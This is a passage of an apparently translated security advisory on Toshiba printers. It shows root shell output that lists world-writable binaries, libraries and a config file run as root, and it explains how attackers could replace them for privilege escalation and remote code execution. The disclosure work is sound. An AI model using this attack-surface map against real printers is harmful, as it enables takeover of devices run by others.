/home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix
-
/home/SYSROM_SRC/build/thirdparty/bin/nqcs
-
/home/SYSROM_SRC/build/thirdparty/bin/nqnd
-
/home/SYSROM_SRC/build/thirdparty/bin/python3.5
-
/home/SYSROM_SRC/build/thirdparty/bin/vsftpd
-
/home/SYSROM_SRC/build/thirdparty/libexec/slapd
-
/home/SYSROM_SRC/build/thirdparty/sbin/snmpd
-
/usr/local/ebx/bin/httpd
-
/usr/local/ebx/httpd_worker/bin/httpd_worker
分析如下所示。
以不安全的权限以 root 身份运行的易受攻击的程序:
bash-4.1# for i in $(ps auxww | grep root | awk '{ print $11 }' | grep -v '^[' | grep -v COMMAND | grep -v '(' | grep -v ':$' | grep -v 'supervising' | sort | uniq); do ls -la $(which "$(echo $i | sed -e 's#^./##')");done-rwxrwxrwx 1 root root 562669 Dec 6 04:10 /home/SYSROM_SRC/build/release/bin/agent_faxreceive-rwxrwxrwx 1 root root 608397 Dec 6 04:11 /home/SYSROM_SRC/build/release/bin/agent_faxtransmit-rwxrwxrwx 1 root root 561916 Dec 6 04:38 /home/SYSROM_SRC/build/release/bin/agent_ipfaxreceive-rwxrwxrwx 1 root root 594505 Dec 6 04:38 /home/SYSROM_SRC/build/release/bin/agent_ipfaxtransmit-rwxrwxrwx 1 root root 572434 Dec 6 04:11 /home/SYSROM_SRC/build/release/bin/agent_print-rwxrwxrwx 1 root root 556369 Dec 6 04:10 /home/SYSROM_SRC/build/release/bin/agent_rip-rwxrwxrwx 1 root root 557372 Dec 6 04:10 /home/SYSROM_SRC/build/release/bin/agent_scan-rwxrwxrwx 1 root root 2191621 Dec 6 02:13 /home/SYSROM_SRC/build/release/bin/alAddressBookMgr-rwxrwxrwx 1 root root 939045 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/alCloning-rwxrwxrwx 1 root root 1019576 Dec 6 02:20 /home/SYSROM_SRC/build/release/bin/alExportImport-rwxrwxrwx 1 root root 1354094 Dec 6 02:15 /home/SYSROM_SRC/build/release/bin/alLogRetriever-rwxrwxrwx 1 root root 734343 Dec 6 02:21 /home/SYSROM_SRC/build/release/bin/alLogmanager-rwxrwxrwx 1 root root 241886 Dec 6 02:24 /home/SYSROM_SRC/build/release/bin/alPanelStartLEDHandler-rwxrwxrwx 1 root root 2282226 Dec 6 02:24 /home/SYSROM_SRC/build/release/bin/alPanelUIMessageHandler-rwxrwxrwx 1 root root 211250 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/alServiceUIPlugin-rwxrwxrwx 1 root root 6104526 Dec 6 03:51 /home/SYSROM_SRC/build/release/bin/alUiFrameWork-rwxrwxrwx 1 root root 673942 Dec 6 02:20 /home/SYSROM_SRC/build/release/bin/alViewPlugin-rwxrwxrwx 1 root root 2896387 Dec 6 02:12 /home/SYSROM_SRC/build/release/bin/alaccountmgr-rwxrwxrwx 1 root root 2917038 Dec 6 02:26 /home/SYSROM_SRC/build/release/bin/alappmanager-rwxrwxrwx 1 root root 1055271 Dec 6 01:49 /home/SYSROM_SRC/build/release/bin/alboserver-rwxrwxrwx 1 root root 322981 Dec 6 02:08 /home/SYSROM_SRC/build/release/bin/alcbamanager-rwxrwxrwx 1 root root 2528851 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/aldevauthmgmtplugin-rwxrwxrwx 1 root root 4386856 Dec 6 03:30 /home/SYSROM_SRC/build/release/bin/aldeviceconfigplugin-rwxrwxrwx 1 root root 4300169 Dec 6 03:25 /home/SYSROM_SRC/build/release/bin/aldeviceserviceplugin-rwxrwxrwx 1 root root 1915456 Dec 6 02:14 /home/SYSROM_SRC/build/release/bin/aleFilingmgr-rwxrwxrwx 1 root root 580229 Dec 6 01:50 /home/SYSROM_SRC/build/release/bin/alfilestoragem-rwxrwxrwx 1 root root 509900 Dec 6 02:21 /home/SYSROM_SRC/build/release/bin/algrpmgr-rwxrwxrwx 1 root root 441641 Dec 6 02:24 /home/SYSROM_SRC/build/release/bin/alhddalertmgr-rwxrwxrwx 1 root root 696894 Dec 6 02:24 /home/SYSROM_SRC/build/release/bin/alhddbackuprestore-rwxrwxrwx 1 root root 829606 Dec 6 02:16 /home/SYSROM_SRC/build/release/bin/alhomedatamgr-rwxrwxrwx 1 root root 606628 Dec 6 03:28 /home/SYSROM_SRC/build/release/bin/alifaxreceive-rwxrwxrwx 1 root root 162074 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/alintegritychkmgr-rwxrwxrwx 1 root root 4414769 Dec 6 02:08 /home/SYSROM_SRC/build/release/bin/aljobcontroller-rwxrwxrwx 1 root root 2832921 Dec 6 02:15 /home/SYSROM_SRC/build/release/bin/aljobtemplatemgr-rwxrwxrwx 1 root root 434559 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/allicensemgmt-rwxrwxrwx 1 root root 1258130 Dec 6 02:15 /home/SYSROM_SRC/build/release/bin/almailboxapplication-rwxrwxrwx 1 root root 4674491 Dec 6 03:32 /home/SYSROM_SRC/build/release/bin/almaintenanceplugin-rwxrwxrwx 1 root root 2339610 Dec 6 02:25 /home/SYSROM_SRC/build/release/bin/alnfcplugin-rwxrwxrwx 1 root root 743285 Dec 6 01:53 /home/SYSROM_SRC/build/release/bin/alnsm-rwxrwxrwx 1 root root 740586 Dec 6 03:45 /home/SYSROM_SRC/build/release/bin/alpanel-rwxrwxrwx 1 root root 292667 Dec 6 02:21 /home/SYSROM_SRC/build/release/bin/alpdlfiltermanager-rwxrwxrwx 1 root root 387749 Dec 6 02:22 /home/SYSROM_SRC/build/release/bin/alpresentationresourcemgr-rwxrwxrwx 1 root root 1314049 Dec 6 01:52 /home/SYSROM_SRC/build/release/bin/alprintmn-rwxrwxrwx 1 root root 2360596 Dec 6 03:22 /home/SYSROM_SRC/build/release/bin/alreportmanager-rwxrwxrwx 1 root root 595735 Dec 6 03:21 /home/SYSROM_SRC/build/release/bin/alreportsmsgr-rwxrwxrwx 1 root root 1367678 Dec 6 02:19 /home/SYSROM_SRC/build/release/bin/alrestrictionmode-rwxrwxrwx 1 root root 1253012 Dec 6 02:21 /home/SYSROM_SRC/build/release/bin/alrolemgr-rwxrwxrwx 1 root root 2272202 Dec 6 02:18 /home/SYSROM_SRC/build/release/bin/alsecurityconfiguration-rwxrwxrwx 1 root root 972621 Dec 6 03:52 /home/SYSROM_SRC/build/release/bin/alsharedprintDp-rwxrwxrwx 1 root root 1060254 Dec 6 02:13 /home/SYSROM_SRC/build/release/bin/alsoftwareupdateclient-rwxrwxrwx 1 root root 1711439 Dec 6 02:25 /home/SYSROM_SRC/build/release/bin/alulm-rwxrwxrwx 1 root root 612467 Dec 6 02:18 /home/SYSROM_SRC/build/release/bin/alusbmscapplication-rwxrwxrwx 1 root root 3759736 Dec 6 02:17 /home/SYSROM_SRC/build/release/bin/aluserAuthMgr-rwxrwxrwx 1 root root 2874311 Dec 6 02:20 /home/SYSROM_SRC/build/release/bin/alusermgr-rwxrwxrwx 1 root root 899734 Dec 6 01:53 /home/SYSROM_SRC/build/release/bin/alwsdiscovery-rwxrwxrwx 1 root root 809391 Dec 6 01:53 /home/SYSROM_SRC/build/release/bin/alwsmex-rwxrwxrwx 1 root root 3782642 Dec 6 01:55 /home/SYSROM_SRC/build/release/bin/alwsprint-rwxrwxrwx 1 root root 4271522 Dec 6 01:56 /home/SYSROM_SRC/build/release/bin/alwsscanner-rwxrwxrwx 1 root root 355919 Dec 6 03:53 /home/SYSROM_SRC/build/release/bin/armn-rwxrwxrwx 1 root root 18113 Dec 6 01:42 /home/SYSROM_SRC/build/release/bin/cipollproc-rwxrwxrwx 1 root root 71587 Dec 6 01:42 /home/SYSROM_SRC/build/release/bin/ciprioritymanager-rwxrwxrwx 1 root root 445362 Dec 6 01:42 /home/SYSROM_SRC/build/release/bin/cischeduler-rwxrwxrwx 1 root root 532898 Dec 6 01:42 /home/SYSROM_SRC/build/release/bin/cissm-rwxrwxrwx 1 root root 508004 Dec 6 01:48 /home/SYSROM_SRC/build/release/bin/cisystemresourcemanager-rwxrwxrwx 1 root root 501163 Dec 6 04:16 /home/SYSROM_SRC/build/release/bin/cpe-rwxrwxrwx 1 root root 1016124 Dec 6 04:39 /home/SYSROM_SRC/build/release/bin/de_ipfax-rwxrwxrwx 1 root root 303779 Dec 6 04:16 /home/SYSROM_SRC/build/release/bin/dem-rwxrwxrwx 1 root root 622110 Dec 6 04:16 /home/SYSROM_SRC/build/release/bin/dim-rwxrwxrwx 1 root root 12229927 Dec 6 04:44 /home/SYSROM_SRC/build/release/bin/ebx_dl-rwxrwxrwx 1 root root 1649127 Dec 6 04:02 /home/SYSROM_SRC/build/release/bin/informationservice-rwxrwxrwx 1 root root 1257189 Dec 6 04:01 /home/SYSROM_SRC/build/release/bin/notificationservice-rwxrwxrwx 1 root root 426167 Dec 6 04:14 /home/SYSROM_SRC/build/release/bin/pipeMN-rwxrwxrwx 1 root root 269419 Dec 6 04:02 /home/SYSROM_SRC/build/release/bin/sim-rwxrwxrwx 1 root root 258577 Dec 6 04:02 /home/SYSROM_SRC/build/release/bin/sljobmanagement-rwxrwxrwx 1 root root 32089 Mar 14 16:28 /home/SYSROM_SRC/build/release/bin/ssdktimestamp-rwxrwxrwx 1 root root 5986687 Dec 6 04:07 /home/SYSROM_SRC/build/release/bin/wfpc-rwxrwxrwx 1 root root 78627 Dec 6 02:00 /home/SYSROM_SRC/bin/alllmnr-rwxrwxrwx 1 root root 68223 Dec 6 01:57 /home/SYSROM_SRC/bin/dnsValidateDaemon-rwxrwxrwx 1 root root 104184 Dec 6 01:48 /home/SYSROM_SRC/bin/eBXDebugLogUtility-rwxrwxrwx 1 root root 76674 Dec 6 02:01 /home/SYSROM_SRC/bin/ipv6_daemon-rwxrwxrwx 1 root root 28318 Dec 6 01:40 /home/SYSROM_SRC/bin/mapper-rwxrwxrwx 1 root root 167219 Dec 6 01:48 /home/SYSROM_SRC/bin/syscallerr-rwxrwxrwx 1 root root 316382 Dec 6 02:03 /home/SYSROM_SRC/build/release/bin/aleSCL-rwxrwxrwx 1 root root 21142 Dec 6 02:01 /home/SYSROM_SRC/build/release/bin/alftpprintd-rwxrwxrwx 1 root root 243145 Dec 6 01:53 /home/SYSROM_SRC/build/release/bin/alhp9100-rwxrwxrwx 1 root root 84257 Dec 6 01:56 /home/SYSROM_SRC/build/release/bin/allld2d-rwxrwxrwx 1 root root 270934 Dec 6 01:53 /home/SYSROM_SRC/build/release/bin/allprng-rwxrwxrwx 1 root root 389522 Dec 6 02:02 /home/SYSROM_SRC/build/release/bin/alnetefiRemoteifsr-rwxrwxrwx 1 root root 15176259 Dec 6 03:39 /home/SYSROM_SRC/build/release/bin/alstage2-rwxrwxrwx 1 root root 126466 Dec 6 02:01 /home/SYSROM_SRC/build/release/bin/alusbPrint-rwxrwxrwx 1 root root 1419229 Dec 6 02:01 /home/SYSROM_SRC/build/release/bin/faxmilter-rwxrwxrwx 1 root root 21638 Dec 6 03:28 /home/SYSROM_SRC/build/release/bin/snmp_watchdog-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 /usr/local/ebx/bin/httpd-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34 /usr/local/ebx/httpd_worker/bin/httpd_worker
前面的命令列出了我们可以分析的符号链接,我们可以确认它们也由于不安全的权限而容易受到攻击:
lrwxrwxrwx 1 root root 35 Mar 14 16:27 /home/SYSROM_SRC/bin/dibbler-client -> ../../thirdparty/bin/dibbler-client
lrwxrwxrwx 1 root root 26 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/alipp -> ../../thirdparty/bin/alipp
lrwxrwxrwx 1 root root 39 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/mDNSResponderPosix -> ../../thirdparty/bin/mDNSResponderPosix
lrwxrwxrwx 1 root root 25 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/nqcs -> ../../thirdparty/bin/nqcs
lrwxrwxrwx 1 root root 25 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/nqnd -> ../../thirdparty/bin/nqnd
lrwxrwxrwx 1 root root 30 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/slapd -> ../../thirdparty/libexec/slapd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/snmpd -> ../../thirdparty/sbin/snmpd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/vsftpd -> ../../thirdparty/bin/vsftpd
lrwxrwxrwx 1 root root 27 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/python -> ../../thirdparty/bin/python
bash-4.1# for i in dibbler-client alipp mDNSResponderPosix nqcs nqnd vsftpd python; do ls -la /home/SYSROM_SRC/build/thirdparty/bin/$i;done
-rwxrwxrwx 1 root root 11339780 Dec 6 01:38 /home/SYSROM_SRC/build/thirdparty/bin/dibbler-client
-rwxrwxrwx 1 apache messagebus 653763 Dec 6 01:40 /home/SYSROM_SRC/build/thirdparty/bin/alipp
-rwxrwxrwx 1 root root 429709 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/bin/mDNSResponderPosix
-rwxrwxrwx 1 apache messagebus 1342015 Dec 6 01:35 /home/SYSROM_SRC/build/thirdparty/bin/nqcs
-rwxrwxrwx 1 apache messagebus 501752 Dec 6 01:35 /home/SYSROM_SRC/build/thirdparty/bin/nqnd
-rwxrwxrwx 1 root root 232030 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/bin/vsftpd
lrwxrwxrwx 1 root root 7 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/python -> python3
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/libexec/slapd
-rwxrwxrwx 1 root root 1709140 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/libexec/slapd
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/sbin/snmpd
-rwxrwxrwx 1 apache messagebus 41801 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/sbin/snmpd
bash-4.1# ls -la /home/SYSROM_SRC/build/release/bin/python3
lrwxrwxrwx 1 root root 28 Mar 14 16:27 /home/SYSROM_SRC/build/release/bin/python3 -> ../../thirdparty/bin/python3
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3
lrwxrwxrwx 1 root root 9 Mar 14 16:27 /home/SYSROM_SRC/build/thirdparty/bin/python3 -> python3.5
bash-4.1# ls -la /home/SYSROM_SRC/build/thirdparty/bin/python3.5
-rwxrwxrwx 1 root root 20997 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/bin/python3.5
bash-4.1#
攻击者可以远程破坏任何东芝打印机。
任何本地或远程攻击者都可以将这些程序替换为恶意程序。
详细信息 – 使用库的不安全权限进行本地权限提升和远程代码执行
一些特定于供应商的程序在东芝打印机内运行。这些程序以 root 身份运行,并使用具有不安全权限 (777) 的库中的代码,从而允许攻击者用恶意库替换这些库。通过使用预先身份验证的远程代码执行作为 root 或 apache 上传恶意库以及多个本地权限升级漏洞,还可以利用此本地权限升级作为远程代码执行。
例如, /home/SYSROM_SRC/bin/syscallerr程序以 root 身份定期运行:
/home/SYSROM_SRC/bin/syscallerr示例:
pspy32的输出,我们可以在其中看到/home/SYSROM_SRC/bin/syscallerr以 root 身份定期运行:
2023/05/27 16:13:35 CMD: UID=0 PID=31370 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31373 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31372 | grep total
2023/05/27 16:13:35 CMD: UID=0 PID=31371 | sh -c du -cb /work/log/corefiles/core.* 2> /dev/null | grep total | awk '{print $1}'
2023/05/27 16:13:35 CMD: UID=0 PID=31374 | /home/SYSROM_SRC/bin/syscallerr
2023/05/27 16:13:35 CMD: UID=0 PID=31376 | awk {print}
2023/05/27 16:13:35 CMD: UID=0 PID=31375 |
2023/05/27 16:13:35 CMD: UID=0 PID=31377 | sh -c ps -e | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31379 | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31378 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31380 | /home/SYSROM_SRC/bin/syscallerr
2023/05/27 16:13:35 CMD: UID=0 PID=31383 | sh -c ps -e | grep ebx_dl | awk '{print $5}'
2023/05/27 16:13:35 CMD: UID=0 PID=31382 |
2023/05/27 16:13:35 CMD: UID=0 PID=31381 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31384 | sh -c ps -e | grep cissm
2023/05/27 16:13:35 CMD: UID=0 PID=31386 | grep cissm
2023/05/27 16:13:35 CMD: UID=0 PID=31385 | ps -e
2023/05/27 16:13:35 CMD: UID=0 PID=31387 | sh -c dd if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL > /dev/null 2>&1
2023/05/27 16:13:35 CMD: UID=0 PID=31388 | dd if=/dev/mtdblock1 of=/ramdisk/FROM_SERIAL
2023/05/27 16:13:35 CMD: UID=0 PID=31389 | sh -c ps -e | grep ebx_dl
2023/05/27 16:13:35 CMD: UID=0 PID=31391 | grep ebx_dl
在分析这个程序时,我们可以发现几个将被加载的共享库——它们的代码将以 root 身份执行。
我们可以找到之前用LD_PRELOAD定义的易受攻击的共享库:
-
/ramdisk/al/libGetNameInfoInterface.so
我们还可以找到几个正在加载的库:
bash-4.1# ldd /home/SYSROM_SRC/bin/syscallerr
linux-gate.so.1 => (0x777c0000)
/ramdisk/al/libGetNameInfoInterface.so (0x777b1000)
/ramdisk/al/libGetAddtInfoInterface.so (0x777a0000)
libpthread.so.0 => /lib/libpthread.so.0 (0x77780000)
libsqlite3.so.0 => /usr/lib/libsqlite3.so.0 (0x4be4c000)
libciindexeddb.so => /home/SYSROM_SRC/build/release/lib/libciindexeddb.so (0x77729000)
libsyscallerr.so => /home/SYSROM_SRC/build/release/lib/libsyscallerr.so (0x77720000)
libcios.so => /home/SYSROM_SRC/build/release/lib/libcios.so (0x776ad000)
libatawrapper.so.0 => /mfp/lib/libatawrapper.so.0 (0x7768b000)
libmfpcommonwrapper.so.0 => /mfp/lib/libmfpcommonwrapper.so.0 (0x77682000)
libcrypto.so.1.0.0 => /home/SYSROM_SRC/build/release/lib/libcrypto.so.1.0.0 (0x77420000)
libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0x4c04f000)
libgcc_s.so.1 => /lib/libgcc_s.so.1 (0x4c14b000)
libintlc.so.5 => /usr/lib/libintlc.so.5 (0x773c3000)
libsvml.so => /mfp/lib/libsvml.so (0x76ba9000)
libc.so.6 => /lib/libc.so.6 (0x4bc67000)
libdl.so.2 => /lib/libdl.so.2 (0x4bdaf000)
libllmnrclient.so => /home/SYSROM_SRC/build/release/lib/libllmnrclient.so (0x76b95000)
/lib/ld-linux.so.2 (0x4bc47000)
libsqlite.so.0 => /home/SYSROM_SRC/build/release/lib/libsqlite.so.0 (0x76b35000)
libcpanel.so.0 => /mfp/lib/libcpanel.so.0 (0x76b0e000)
libcimsg.so => /home/SYSROM_SRC/build/release/lib/libcimsg.so (0x76b02000)
libcissmclient.so => /home/SYSROM_SRC/build/release/lib/libcissmclient.so (0x76ae8000)
libacl.so.1 => /lib/libacl.so.1 (0x4bdd7000)
librt.so.1 => /lib/librt.so.1 (0x4be15000)
libm.so.6 => /lib/libm.so.6 (0x76abf000)
libssdk.so.0 => /home/SYSROM_SRC/build/release/lib/libssdk.so.0 (0x75f1e000)
libcihdb.so => /home/SYSROM_SRC/build/release/lib/libcihdb.so (0x75e56000)
libattr.so.1 => /lib/libattr.so.1 (0x4bdd0000)
libpam.so.0 => /lib/libpam.so.0 (0x75e4a000)
libldap-2.4.so.2 => /home/SYSROM_SRC/build/release/lib/libldap-2.4.so.2 (0x75e12000)
libssl.so.1.0.0 => /home/SYSROM_SRC/build/release/lib/libssl.so.1.0.0 (0x75da6000)
libk5crypto.so.3 => /usr/lib/libk5crypto.so.3 (0x75d84000)
libresolv.so.2 => /lib/libresolv.so.2 (0x4c164000)
libext2fs.so.2 => /usr/lib/libext2fs.so.2 (0x75d5a000)
libuuid.so.1 => /usr/lib/libuuid.so.1 (0x4be0f000)
libkrb5support.so.0 => /usr/lib/libkrb5support.so.0 (0x75d53000)
libkrb5.so.25 => /home/SYSROM_SRC/build/release/lib/libkrb5.so.25 (0x75ce2000)
libgssapi.so.2 => /home/SYSROM_SRC/build/release/lib/libgssapi.so.2 (0x75cae000)
libCryptolib.so.0 => /home/SYSROM_SRC/build/release/lib/libCryptolib.so.0 (0x75c2b000)
libirng.so => /usr/lib/libirng.so (0x75c22000)
libcilkrts.so.5 => /usr/lib/libcilkrts.so.5 (0x75bee000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x4c403000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x75bbc000)
liblber-2.4.so.2 => /home/SYSROM_SRC/build/release/lib/liblber-2.4.so.2 (0x75bb0000)
libsasl2.so.2 => /home/SYSROM_SRC/build/release/lib/libsasl2.so.2 (0x75b8c000)
libcom_err.so.2 => /usr/lib/libcom_err.so.2 (0x4bdee000)
libhx509.so.5 => /home/SYSROM_SRC/build/release/lib/libhx509.so.5 (0x75b4b000)
libheimsqlite.so.0 => /home/SYSROM_SRC/build/release/lib/libheimsqlite.so.0 (0x75ad7000)
libhcrypto.so.4 => /home/SYSROM_SRC/build/release/lib/libhcrypto.so.4 (0x75aa4000)
libasn1.so.8 => /home/SYSROM_SRC/build/release/lib/libasn1.so.8 (0x75a02000)
libwind.so.0 => /home/SYSROM_SRC/build/release/lib/libwind.so.0 (0x759da000)
libcom_err.so.1 => /home/SYSROM_SRC/build/release/lib/libcom_err.so.1 (0x759d6000)
libroken.so.18 => /home/SYSROM_SRC/build/release/lib/libroken.so.18 (0x759c2000)
libheimntlm.so.0 => /home/SYSROM_SRC/build/release/lib/libheimntlm.so.0 (0x759bc000)
bash-4.1#我们可以找到这31个不安全的库:
-
/home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0
-
/home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0
-
/home/SYSROM_SRC/build/release/lib/libcios.so.0
-
/mfp/lib/libatawrapper.so.0.0
-
/mfp/lib/libmfpcommonwrapper.so.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0
-
/mfp/lib/libsvml.so
-
/home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-
/mfp/lib/libcpanel.so.0.0
-
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-
/home/SYSROM_SRC/build/release/lib/libcissmclient.so.0
-
/home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
-
/home/SYSROM_SRC/build/release/lib/libcihdb.so.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
-
/home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
-
/home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0
-
/home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6
-
/home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
-
/home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
-
/home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0
-rwxrwxrwx 1 root root 322261 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libciindexeddb.so.0
-rwxrwxrwx 1 root root 343680 Dec 6 01:48 /home/SYSROM_SRC/build/release/lib/libsyscallerr.so.0
-rwxrwxrwx 1 root root 566991 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcios.so.0
-rwxrwxrwx 1 root root 139986 Sep 19 2019 /mfp/lib/libatawrapper.so.0.0
-rwxrwxrwx 1 root root 38330 May 28 2019 /mfp/lib/libmfpcommonwrapper.so.0.0
-rwxrwxrwx 1 apache messagebus 2765203 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/lib/libcrypto.so.1.0.0
-rwxrwxrwx 1 root root 9479623 Apr 25 2014 /mfp/lib/libsvml.so
-rwxrwxrwx 1 root root 95211 Dec 6 02:00 /home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0
-rwxrwxrwx 1 root root 744984 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-rwxrwxrwx 1 root root 48131 Apr 8 2019 /mfp/lib/libcpanel.so.0.0
-rwxrwxrwx 1 root root 58976 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-rwxrwxrwx 1 root root 744984 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libsqlite.so.0.8.6
-rwxrwxrwx 1 root root 58976 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcimsg.so.0
-rwxrwxrwx 1 root root 127850 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcissmclient.so.0
-rwxrwxrwx 1 root root 14101772 Dec 6 01:40 /home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0
-rwxrwxrwx 1 root root 909064 Dec 6 01:41 /home/SYSROM_SRC/build/release/lib/libcihdb.so.0
-rwxrwxrwx 1 root root 269392 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6
-rwxrwxrwx 1 apache messagebus 485480 Dec 6 01:28 /home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0
-rwxrwxrwx 1 root root 251701 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libgssapi.so.2.0.0
-rwxrwxrwx 1 root root 539700 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0
-rwxrwxrwx 1 root root 624082 Dec 6 04:53 /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0
-rwxrwxrwx 1 root root 624082 Apr 20 2018 /home/SYSROM_SRC/NoBuildItems/common/lib/libCryptolib.so.0.0.0
-rwxrwxrwx 1 root root 60708 Dec 6 01:34 /home/SYSROM_SRC/build/thirdparty/lib/liblber-2.4.so.2.5.6
-rwxrwxrwx 1 root root 324233 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0
-rwxrwxrwx 1 root root 525228 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0
-rwxrwxrwx 1 root root 225346 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0
-rwxrwxrwx 1 root root 759349 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0
-rwxrwxrwx 1 root root 166289 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0
-rwxrwxrwx 1 root root 14571 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3
-rwxrwxrwx 1 root root 92942 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0
-rwxrwxrwx 1 root root 24134 Dec 6 01:27 /home/SYSROM_SRC/build/thirdparty/lib/libheimntlm.so.0.1.0
攻击者可以远程攻击任何东芝打印机。
这些程序所使用的库(超过数百个)可以被任何本地或远程攻击者用恶意库替换。
详细信息 – 使用 CISSM 进行本地权限提升和远程代码执行
我们发现该cissm程序在打印机内以 root 身份运行。这个东芝专用程序将根据/home/SYSROM_SRC/build/common/bin/ssm.xml打印机中存储的 XML 文件的内容启动子进程,如下所示:
bash-4.1# ps auxw | grep cissmroot 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02 ./cissm -T 7 -d ssm.xmlbash-4.1# pstree[...]|-cissm-+-alAddressBookMg| |-alCloning| |-alExportImport| |-alLogRetriever| |-alLogmanager---{alLogmanager}| |-alPanelStartLED---{alPanelStartLE}| |-alPanelUIMessag---{alPanelUIMessa}| |-alServiceUIPlug| |-alUiFrameWork---24*[{alUiFrameWork}]| |-alViewPlugin---3*[{alViewPlugin}]| |-alaccountmgr---2*[{alaccountmgr}]| |-alappmanager-+-2*[python---5*[{python}]]| | `-15*[{alappmanager}]| |-alboserver---7*[{alboserver}]| |-alcbamanager---26*[{alcbamanager}]| |-aldevauthmgmtpl| |-aldeviceconfigp| |-aldeviceservice---{aldeviceservic}| |-aleFilingmgr| |-alfilestoragem| |-algrpmgr| |-alhddalertmgr| |-alhddbackuprest| |-alhomedatamgr| |-alifaxreceive| |-alintegritychkm| |-aljobcontroller---8*[{aljobcontrolle}][...]
cissm 使用的 XML 配置文件位于/home/SYSROM_SRC/build/thirdparty/bin/ssm.xml且具有不安全的权限:
